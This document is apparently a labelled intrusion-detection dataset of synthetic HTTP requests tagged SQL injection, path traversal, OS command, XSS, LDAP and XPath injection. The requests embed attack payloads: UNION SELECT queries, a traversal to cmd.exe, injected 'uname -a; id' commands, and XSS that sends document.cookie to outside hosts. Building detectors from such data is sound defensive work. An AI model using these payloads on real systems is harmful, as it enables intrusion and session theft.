~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49446
Start - Id: 41456
class: SqlInjection
PUT /hyiccrsTeRsLccil/k5YdWPf_.cfm? HTTP/1.1
Content-Length: 300
Content-Language: Aze,yanAfih,a
Content-Encoding: identity
Content-Location: /nhttzes/eeeenar/une2iEO/daon.nsf
Content-MD5: dm81RTdud29UdGF3bnB3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 09:26:54 CET
Last-Modified: Mon, 05 Apr 04 16:58:21 GMT
Host: 15.173.242.165
Connection: mfnc
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 29.250.237.27
Cookie: ssfltmtevyLm=ntn1exeepaD6er;4ws13gasaI=aa0diFs8ejnoa
Cookie2: $Version="17"
Date: Tue, 22 Sep 09 01:01:01 UTC
ETag: W/"UtjPHEnCvSW5I-JRNNL"
Expect: qbgdelee=Idon
From: utrstns@Temsn.st
If-Modified-Since: Sun, 28 Sep 08 04:31:58 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: "V5f_NPqKCaGDBLf5pB"
If-None-Match: "4qNTzRe83ha600Dy_To3"
If-Range: "A6dE0CMJSLmqFf1d"
Max-Forwards: 40
MIME-Version: 2.7
Pragma: irseutt='nw'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://www.7rmyoNa.de/zsooao.sh
TE: gzip,chunked;q=0.5
Trailer: Expect
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 5.4; ea-la; rv:9.9.3) Gecko/31326681
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ceao=c&B2sobjectchildtmpPN=5535&esIsltolS=ecr= &errvarr=ehNiEhochrSy&hluuyaawado30=aiopen]fweno|&BwaNb-A7Vz.=auxwaen&hus7oxpbdiitbQk=oem2&dirrthe6reqfbtj=chairs'   UNION   SELECT 9anyarnbt  FROM    dba_users   WHERE  name     like     '%25&sAdatnf8RNin4iz=153409337&niogoavswae=5&cnhis=94

End - Id: 41456
Start - Id: 36093
class: PathTransversal
GET /rBWnY-b_6CrzDVrhmMAT/rHp6ouolteo4a/o2/wcp3e@iframeWV5ttpZJ/etdLYuRJcoyCnfFkD@l/SUmmb_0azpo/7-.js?ph=hWUINB0%40&FDtf=%5CWINDOWS%5Csystem.ini&yntrtortc=tDxiEaeTo5liko&SK.9e1g@r=eiishs2lw4ra&aSwnelT=33&tordetmuon=styleeinsertcmtdmnsincludenullen0icM&B7rhttpKmeta0=6518 HTTP/1.1
Host: 216.243.76.86:355
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 142.104.22.126
Cookie: halupuchyg=30736;TOdgYC=0;UFUr1-vJxu=l9Q_F@oC;esptoho0Nsdea5=831467;eectoydnso=4;bqeqtAsRe=48429145
Cookie2: $Version="56"
Date: Fri, 30 Nov 07 22:23:32 UTC
ETag: W/"Y2c3Smyqo1dEDpGFg_"
Expect: imasrae
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 25 Oct 04 20:58:02 UTC
If-Unmodified-Since: Thu, 27 Oct 05 22:31:52 CET
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: *
If-Range: "LJXpsVhHO5-5hS.XC3"
Max-Forwards: 73
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest username="ftps"
Authorization: rtt8d pqeoe=bouttla
Range: 580617-399630,-49399
Referer: /sNHt/j5e7oyd/7ixtemve.htm
TE: trailers,deflate;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 6.3; 7q-re; rv:4.2.9) Gecko/87253042
UA-CPU: 68000
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5584x598
Via: 1.3 www.hlkbtat.css:41, FTP/9.0 255.117.144.31
Transfer-Encoding: compress
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 76.95.176.105
X-Serial-Number: 521332915
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36093
Start - Id: 43812
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.tses.biz
Connection: tiuYS
Accept: audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=918
Client-ip: 117.85.13.55
Cookie: eleneHassefFeb=c<rEesn<hsevLinI ;0h4eshlea=t4uuex;srsh0bkvml=igramochahnecho
Cookie2: $Version="9"
Date: Thu, 18 Sep 08 10:26:50 CET
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: trty=ewnjetuk;ec4Oaae=mthnicad
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: "coV8IVwYjBxRDjgA"
If-Range: "@o5jE@ZiA1Yx-EHdNYf"
Max-Forwards: 901
MIME-Version: 0.3
Pragma: owc=tGertwoh
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: ohtI Fgiueot=04Bshd
Range: 904036-,02113-35,44499-
Referer: http://u3sXas.fr/rd9o/epynMr/T6neobmg/oeoSNlo.js
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: h34mi4itiu/8.2
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: FTP/2.5 134.172.198.1
Transfer-Encoding: otoh7
Upgrade: ren9do/0.2, 2ieds/4.2, a63ht/7.8, ezecpO/2.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43812
Start - Id: 46693
class: XSS
GET /8-SlocationcEW88W6kpasswdandZ/lGoVoT0tDfAUQ4Azxcy.asmx?myaeeas9gf=uRah%26oittrlet&Rv9x=9u8&niU=5377192783&idnnrzco=t4+7dedsls-2wh6&xdeuasrtvG=ks%3AfwX%3Cgergqi0la&ObLM-TvscriptC5I=oincludeTdw+aelibftxe&oebn=nlwvseGui1lrnhl&mhnlESeh=tmpie+a%25coe98oO%3F+&nosnrdTimsAt=lseIjPnEU&rnd4ctW7z=e7StYOzS-%40Zo&wdledfia=d10i6ScdBM&erataere5n=3mWnts HTTP/1.0
Host: 146.191.149.37
Connection: dnbmbnz
Accept: text/html;q=0.5, text/*
Accept-Charset: us-ascii, utf-7;q=0.8
Accept-Encoding: 
Accept-Language: mrty-osz;q=0.2, Khjnq-mb9yw, suoh-otrs;q=0.7, ncnewab-eprs03rr;q=0.5
Cache-Control: no-store
Client-ip: 1.55.5.165
Cookie: lrkltNuqfge1te=i i;itehe=a-dphpsaDajnoJo;bpekkte7Renta=<div  style =   "     behaviour:   url([http://www.chge.com/script/nt.swf]);"   >
Cookie2: $Version="128"
Date: Wed, 01 Sep 04 16:23:25 CET
ETag: "-ryAjD.ESzLF3wn2-P"
Expect: 100-continue
From: ewaeiu@9Hea3Eeae.cz
If-Modified-Since: Tue, 27 Jun 06 18:14:14 GMT
If-Unmodified-Since: Tue, 07 Jun 05 17:15:05 CET
If-Match: "5mntQ_8i-XsLvFaEB"
If-None-Match: "phiWOvU6IKrBVF27c@@h"
If-Range: Tue, 12 Jan 10 18:38:18 GMT
Max-Forwards: 1157
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: 6eo7l rrpb=5fahe
Authorization: Digest opaque="ttoa"
Range: -441983,369-,-36125
Referer: http://niJti.org/eiRuCcbi.js
TE: chunked;q=0.9,trailers
User-Agent: Mozilla/5.5 (X11; U; Open BSD i586 3.0; ee-tl; rv:5.2.2) Gecko/73102246
UA-Color: color32
UA-Pixels: 846x3325
Via: aEvttr/1.9 www.Luire.js:54794
Transfer-Encoding: identity
Warning: 551 www.rrtles.tiff "mtemnedikCwpaoSe" 
X-Forwarded-For: 7.125.26.87
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46693
Start - Id: 46651
class: XSS
GET /3aeygraoOulicml/etbZ2rJQv/0RlbUU/yeok/nHZLH.LwgEwO4b@/oMnccatQboot.iniaZjw/mecwo/taSgc-vGKH73y7SVUCMj/sc/nCtePuQ9E/apJU2JWxiGb6mOAP.htm?xep9awrnabn=e5c-1&elilido=0hoeeotnOa5sdd&ceaeataeegfruTi=25011&sfsh=891583&ueq13ws7eqtiO3k=ilEwcs%3Cer+&n0ee=5ebpw%5Dcoiy%5B&otqnepeRoeaet=l%5Cbycrms6Vdk8mB&mo7niesrat1zuEa=Mri2Mzi%2Fred%3CAdrleR%3D&tso4sielr9y=p3Jy%40vE&dieGsie=dp7Ar062 HTTP/1.0
Host: 208.24.31.20:6
Connection: close
Accept: audio/x-wav, audio/basic;q=0.8
Accept-Charset: *
Accept-Language: 7fhesbhp-3hrart;q=0.5, rdso-Tegw;q=0.9, eb2oEm-eroftYex;q=0.0, enuasb-ce
Client-ip: 128.219.184.233
Date: Tue, 01 Dec 09 19:12:05 GMT
If-Modified-Since: Fri, 25 Jul 08 16:46:36 GMT
If-Match: *
Max-Forwards: 88
Pragma: no-cache
Range: 1-74039,27-02
Referer: /poAj/i7nib7a.exe
User-Agent: <meta  http-equiv   =   "    refresh   "     content  = "     0;url=javascript:    [document.location.replace  ('http://www.esse.com/cgi-bin/olgeator.cgi'+document.cookie);]"   >
UA-OS: Mac OS X

null

End - Id: 46651
Start - Id: 38040
class: LdapInjection
GET /fyino/hipHn/b32XFnb/thmEnnhntaauiae/execCNws/sSYAcRX1HqVRcJXa4E0/Eoa/cruszuhtjeed/e3c50PWLg@I/exIvo71If/ieo.aspx?group by5scriptL=prsGd&Sorwknop2=ax_DL&BNfRK4WC3f=gud7C_k&cSwerh=779&aog8atc7eil=673%29%28%26%28objectClass%3D0ob%29%28%7C%28sn%3D++++bao%29%28cn%3Dw+J*%29%29 HTTP/1.1
Host: www.heevsomxi9.org
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.4, x-mac-arabic, x-mac-korean;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 245.129.164.208
Cookie: a5ncwnst=no;rlu32wieyoneetj=noa;r1t= uhtmpeoncdre
Cookie2: $Version="76"
Date: Tue, 20 Jun 06 11:30:51 GMT
ETag: W/"vj5M3jvGarnUNXVbic"
Expect: el5e=GntnhEqt
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 15 Sep 09 20:04:22 CET
If-Unmodified-Since: Tue, 13 Oct 09 03:34:09 CET
If-Match: *
If-None-Match: *
If-Range: "Zq92KHqjhBsQQbWzz9T"
Max-Forwards: 04
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest response="96bfBB32CcDd3a38F47Dc1cFBEDEC3d4"
Range: 5217-69596,5-
Referer: http://www.gtsrheq.org/coWaTnL.msf
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: oedaCuty0/4.0
UA-CPU: MIPS
UA-Disp: 879,787,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 2.3 www.sr9aepne.shtml, FTP/1.8 245.214.53.113, 5.8 25.40.215.110
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 864 185.80.26.144 "Nciqesnma5Srctnr" "Wed, 25 Nov 09 18:45:33 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38040
Start - Id: 42475
class: SqlInjection
GET /vQ/gpfetayet3o/eD3Q9N0qc8Q5InFE/rtottage/kVZVWg.e0ZQH09/irEuldhozma6s4nn/tjKoNrRSZFI37vKe.z9/LsQG7c--/h3khtpassHxVB-a/otSkjeic0oIeaiRe/TIF4/wGV-vKr.css?mkahvakdrpowl=275857123&tesAondna2rgh=%3DDtph&raeinnnfa=smrhtifausbdcTdy&tldec7o7h=10968571&nesir=oaeee&e3vOer9loo=a8i&3tma=%7Eh%5Dgeeimge%3C%27oiu3vbscripti&syneoe3ul=ckYaJTzU&5rqkDateoeh=thew&sall4PPWcatO=fY6DOxVc&4ri=Xsonieb%27++UNION++++ALL+++SELECT++++ott3eq7l++FROM+++++thitmtr4+++WHERE+%27%27++++%3D+%27&sr9F0boot.iniYkQc=79681110 HTTP/1.1
Host: 184.161.72.20:8326
Connection: keep-alive
Accept: image/*;q=0.4, application/postscript;q=0.9
Accept-Charset: isiri-3342;q=0.6, iso-8859-9
Accept-Encoding: 
Accept-Language: Sfe3vn8h-8hh;q=0.1, omhgomae-s4k;q=0.5, 2ttart-ho;q=0.9
Cache-Control: max-age=93
Client-ip: 215.204.118.143
Cookie: ehcfue=csrn
Cookie2: $Version="01"
Date: Thu, 13 Dec 07 24:29:00 GMT
ETag: W/"O31nD@J3Iu0A1HEKQNyE"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Wed, 17 Oct 07 04:41:04 GMT
If-Unmodified-Since: Mon, 18 Oct 04 21:41:00 CET
If-Match: *
If-None-Match: "yo2o7LlG6dr701a7PRs"
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 88
MIME-Version: 4.3
Pragma: Df='n2'
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 7-59040
Referer: /l4awIms/BVacge8h/9ehac.php3
TE: gzip,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.7 (compatible; Konqueror/5.0; Win98; eviua)
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/1.2 64.160.114.64, 4.9 www.bzwpSBd.jpg, 3.2 www.zSsrwCp.htm
Transfer-Encoding: identity
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42475
Start - Id: 49921
class: XPathInjection
GET /bcfhyoeer/9apd3prttis6mole/netiiltal/systemVghbin.MdaD5LC.2/erisoo6scteAalenmeo/yylmA/S3u7ye.jpeg?bek=drsHpd%2Ftco%2Ffe3%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D19%5D++++%7C++Pdf%2Fhsrue%2Fs5r%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D184%5D++or+++++%27s00ex%27+%3D++++%27 HTTP/1.0
Host: 233.66.31.223
Connection: close
Accept: image/*, video/quicktime;q=0.4, text/plain;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: vrwii-shde, po-ai2WamD, Iooo-akdsweC
Cache-Control: max-stale=6165
Client-ip: 69.149.110.120
Cookie: seoeanHquean=18714
Cookie2: $Version="455"
Date: Fri, 09 Apr 10 02:52:53 UTC
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Sun, 04 Nov 07 11:22:48 GMT
If-Unmodified-Since: Sat, 21 Mar 09 01:35:06 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 22:25:22 GMT
Max-Forwards: 995
MIME-Version: 8.6
Pragma: dhL=eot3in
Proxy-Authorization: Basic Z0lmcnFibGE6eHJ1ZXJvb24=
Authorization: 2ahlAk eisydtns=lNj3t
Range: -983
Referer: http://NAnmetr.gov/tsuQ.sh
TE: gzip;q=0.4,trailers
Trailer: Host
User-Agent: gem3oagbpav
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 5.1 249.51.174.127, 2.5 www.xoHhg8S.js
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49921
Start - Id: 38428
class: LdapInjection
GET /jAVk0/5aoenhwdwg1hrai/onneaeO/spassthruA2eyetcW/ceeditkegwega/6liZwz/anyf/z5t/s1eeaidfns/6jK1v5UOylFdboot.inioE/ecLGPkpMaCw/ehs3rhdReigbepesetel.jsp?Ppqhinsert7j0=6nor%29%28%26%28objectClass+++%3Dba3h*%29 HTTP/1.1
Host: 89.241.18.90
Connection: keep-alive
Accept: video/*, image/jpeg;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: win4-sk, ilOrt-y, rmMmzd-azsnh
Cache-Control: no-cache
Client-ip: 174.114.246.188
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="8"
Date: Fri, 27 May 05 09:50:07 CET
ETag: "caysJ7Ou24aNUTvQ"
Expect: 100-continue
From: Le6sx3@8TUli.gov
If-Modified-Since: Fri, 31 Jul 09 23:37:31 CET
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Mar 09 20:05:54 CET
Max-Forwards: 5
MIME-Version: 3.3
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Digest nc=44BdCDBb
Range: -03,38-
Referer: http://Exrims.org/nbnb5ya/iota/tduoica/etn8SlB/nlbhas.tiff
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (Windows; U; Win98 8.1; zi-wc; rv:0.3.0) Gecko/01018980
UA-CPU: x86
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: soon/5.4 64.89.237.87
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38428
Start - Id: 48173
class: XSS
PUT /eH32MyaW/_o/njCbb_pk@-/srWdvL/gdtpa/50lt@LP15@Z/s5nBgQhFQN0wSoIDPq/syATUgbt6tMuse/rRJJRd@Bz06yb6f5R.E/@Z_binZJcEGKposition3R.php3? HTTP/1.0
Content-Length: 226
Content-Language: yteo,63nrr9is,g
Content-Encoding: gzip
Content-Location: http://o3ts3T.net/0elz4/a1twfI/nr8po10l/nodAian.fgf
Content-MD5: Y29zdGVuZGxtc2VBdG1wdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 May 07 09:14:02 CET
Host: www.wsnTids.cz
Connection: close
Accept: */*
Accept-Charset: cp-932, iso-8859-8, windows-1250, windows-1257;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 167.21.97.69
Cookie: uir2tiNafuid2ad=l;ueujlwMeitbig=7D68Qq;imeods1k=p8L;seyeOliiniao=3735
Cookie2: $Version="5"
Date: Tue, 01 Feb 05 11:24:17 CET
ETag: "UKLTiRifEJ0N6r4cGMc"
Expect: 100-continue
If-Modified-Since: Wed, 24 Nov 04 11:17:59 CET
If-Unmodified-Since: Sun, 08 Apr 07 13:39:35 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 21
MIME-Version: 0.7
Pragma: vzn3nfq=dedSpl
Proxy-Authorization: Basic ZXlnUzpkb050ZWh4
Range: 01606-3,-17,99-
Referer: http://isim8.it/rdnaash/pxpoa3r/deEtai/wrffhny.pdf
Trailer: User-Agent
User-Agent: <object   classid  =" clsid:...    "  codebase =   "   javascript:  [window.open('http://73.67.207.88/tiil.msf'+document.cookie);]  "    >
UA-Disp: 348,337,32
Via: HTTP/3.7 www.saahne.js
Transfer-Encoding: nyeecl; 2lmoriam=ssit37ue
Upgrade: eMe/4.0, mna/3.4
X-Forwarded-For: 96.52.7.71
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bma8ttridn8ure=1216001&in=s.Rl8jL&t5U=e45r&iroaizlLiedts=84hot4oorEt&ntditeYhrIy=13552710&dulei=01244&tjnuaaun1p=yvBV6WUZrJ&nwiq=958&p7eaifrr=nTNtuj5bab2eteh&autcsuhAntahn=rcgedmijdtjin7acop&k8Iu=39280&wmlorcea=6dsunsrvarspaea

End - Id: 48173
Start - Id: 43226
class: OsCommanding
GET /a./ZzcatiWg/aHCX@QsG/rwgs/L3kzQz4AI/4J/sDycqWh8iYskhQV1XC/i3h4r2Vd75/5kWDup_DCIUV.html?ae3u=sjY47&SzeaMerRlnxSn=8214&eirR1dnuypanw=37&hlos=iEM0xRX&iW3Blog=asa&zmRjyinputVh=+++++%3Becho+%3B+++w+++++%3B+++++uname++-a+++++%3B++id HTTP/1.0
Host: www.rafiey.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cnAeai-hrikhIp, pa5ltoe-xeel, hhph-nt
Cache-Control: only-if-cached
Client-ip: 226.147.245.10
Cookie: iservices5MAp=fe pto;gebeaaasie7lts=68367911;imgGiHiA=340;s8oeuku=aSy3gj9
Cookie2: $Version="4"
Date: Sat, 30 Jul 05 05:15:53 GMT
ETag: "9rx-BTA31mnSsAa2XM1t"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Sat, 16 Jan 10 22:51:16 GMT
If-Unmodified-Since: Thu, 18 Mar 10 24:04:22 UTC
If-Match: "OolKYqDtSp3SWyIfo"
If-None-Match: *
If-Range: "v0xW65RH93jR4xe1.zPw"
Max-Forwards: 38
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest username="9indy"
Authorization: Pofq tqty7=7ebloswn
Range: 172-
Referer: http://Ziti.cz/1rwa/ed6ehyo/hshtq/trSott/0u2riauR.conf
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.5 (compatible; kpiDd; SunOS sun4u; eeurhcf8; dghek)
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 476x125
Via: HTTP/8.3 www.ewoa7kf3.htm, FTP/0.8 www.ehnltt.jpg, FTP/9.7 65.1.208.140
Transfer-Encoding: compress
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 539 112.163.9.207 "rxe9Jsee" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3512760212193
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43226
Start - Id: 43394
class: OsCommanding
GET /t7lRtNVMPVfe/igi7hczneqtt4ekiionh/e4JRSdbjRTYg_D4-/rmamjnt1Y73s6n5/eSy9.jpeg?tTa=90&23CMV=thQpLz34rppm&ib=489802005&eoosqGIlYJd=tH-ibWY&9asccfc=3%3AyOve%25fromie%7Eop%24%40de6i+&aPnoeywIrnEye=vYb&fdkk89qcotnu=esaelncshl7o4fdt&YAv3passthru=l%5Dm2%3B&ddbm=%27++++%3Buftp+++-g++++%2Fhome%2Fitle%2Ftinelech+++++61.102.85.77+++++%2Foliton+++++%3B&i5cetlIyRte=9792&keoyi=nyoasspfrzecatir&1OanNTjtimlco=%3Biavt HTTP/1.0
Host: 169.78.238.150:3151
Connection: wmOiLhl
Accept: */*
Accept-Charset: windows-874, big5, windows-1252;q=0.2, windows-1251;q=0.4
Accept-Encoding: *
Accept-Language: 64yipam3-jetre;q=0.3, caotwhtw-ed, i-jcedpa;q=0.5
Cache-Control: no-transform
Client-ip: 143.76.65.70
Cookie: Blt=san:eeeif:oeoo;eentzaepc2=etifh
Cookie2: $Version="82"
Date: Mon, 01 Oct 07 03:20:03 CET
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Sat, 13 May 06 08:25:49 GMT
If-Unmodified-Since: Sun, 15 Nov 09 08:33:03 UTC
If-Match: "v8gUMR38inclouEVOl"
If-None-Match: *
If-Range: "UQ@8pLk9FBJw1xD"
Max-Forwards: 724
MIME-Version: 6.9
Pragma: l=oeaa
Proxy-Authorization: Basic dXNTYmEwOmVlc2g2
Authorization: Basic dHN1cXR5YzpjbHhmag==
Range: -4315,8885-439,063-
Referer: http://www.u2mhvLS.biz/YHOlh/AovR5/ntusy.js
TE: trailers
Trailer: If-Modified-Since
User-Agent: eEqB89k http://www.0tMj.fr
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: FTP/5.0 84.218.27.189
Transfer-Encoding: gzip
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43394
Start - Id: 46703
class: XSS
GET /t8mkyg/xjKO/bmacbsntphN/oettaoanaawbeg0iCxc/rUb/jtDesonwen/1SI/lTenokGatXnwbari/tBfDipr0zE6@29tsC/a@SCG.htm? HTTP/1.1
Host: 32.144.207.49
Connection: keep-alive
Accept: text/*;q=0.1, text/*;q=0.3, video/quicktime;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: en-oto, EueNsts-eait, 3eae9-xA;q=0.1, syntctdr-b, eet-np
Cache-Control: min-fresh=4
Client-ip: 234.153.71.59
Cookie: basc77ijdB=<![CDATA[<!--]]   ><script   >[window.open('http://93.175.249.242/ma.asmx'+document.cookie);]//--></script>;eubwgolnhed7=ftbawpnwu4acydwef;j46i=rItoevrr
Cookie2: $Version="000"
Date: Thu, 18 Nov 04 04:36:58 UTC
ETag: "XcYN.Ilc@nu9IKuHW1"
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Fri, 04 May 07 08:57:37 GMT
If-Unmodified-Since: Tue, 06 Mar 07 09:31:46 CET
If-Match: "_HU-2ifK3TXwH-sR@4Uo"
If-None-Match: "vYtd6PYsdu3duWk-jV"
If-Range: Mon, 16 Jul 07 21:00:52 UTC
Max-Forwards: 4526
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic c2Fob2lrZDpldHQwcmx1ZQ==
Authorization: pkemAl oAhpr=metcuien
Range: 932-03,777-
Referer: http://www.eiev.it/ynns/6tabm/saooh9/biu4.mpg
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 1.7; to-ss; rv:5.5.9) Gecko/33703324
UA-Disp: 417,1521,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 450x131
Via: 1.4 www.heitslsn.js
Transfer-Encoding: avii; 4ernEa1=trdwd
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 183.144.127.62
X-Serial-Number: 24725262315078744174
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 46703
Start - Id: 47524
class: XSS
GET /Eheno/ierictc/Im46SF6OZRXGaccess_login/rNZ-G/maclUttelsi/noqHbdJa/6lmochanYgI.cfm?enliStCsfiithaR=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F87.248.54.88%2Fnd.pl%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&Siurltptneonaeo=f&axt2utljiEr=fn%28tenglexxlus+treplacedm%2B HTTP/1.0
Host: 254.25.206.25
Connection: close
Accept: video/*;q=0.8, video/*;q=0.2, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: stiefc-qaeh;q=0.4, s-lomeuudm;q=0.1, qb-pr
Cache-Control: no-store
Client-ip: 2.40.61.206
